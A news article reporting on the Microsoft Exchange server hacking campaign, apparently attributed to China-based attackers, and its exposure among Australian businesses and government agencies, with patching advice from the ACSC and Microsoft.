Thousands of Australian businesses and government agencies could have been affected by China-based attack on Microsoft’s Exchange server.
A major flaw in Microsoft’s software led to an aggressive hacking campaign which saw companies and government agencies around the world left vulnerable.
More than 7000 businesses using Microsoft Exchange servers in Australia were left exposed to the sophisticated cyberattack. It is unknown how many businesses may have been directly affected.
As Microsoft scrambled to patch any vulnerabilities, the hackers gained access to email servers and installed malicious software which can allow them to return to the target’s server at a later date.
The process – which affected Microsoft Exchange servers from 2013, 2016 and 2019 – is called ‘web shelling’.
According to the AFR, Australia ranked fourth in the world behind the United States, Germany and the UK as the most vulnerable countries to the attack.
Among the organisations used the affected email server was the ACT government. A spokesperson confirmed: “All patches were applied within 24 hours of being notified by Microsoft, and there is no evidence of compromise on ACT government systems”.
The Australian Cyber Security Centre (ACSC) yesterday advised companies using Microsoft Exchange to urgently patch any vulnerabilities.
“The ACSC is monitoring the situation and is able to provide assistance and advice as required,” an ACSC alert said.
“Microsoft has identified that if successfully exploited, these CVEs [common vulnerabilities and exposures] together would allow an unauthenticated attacker to write files and execute code with elevated privileges on the underlying Microsoft Windows operating system,” ACSC added today.
“Microsoft has observed instances where the attacker has uploaded web shells to maintain persistent access to compromise Exchange servers.”
Businesses affected by the hack are advised to follow Microsoft’s advice on web shelling to ensure the attackers can be locked out of the systems for good.
“A single web shell allowing attackers to remotely run commands on a server can have far-reaching consequences,” Microsoft wrote in a blog.
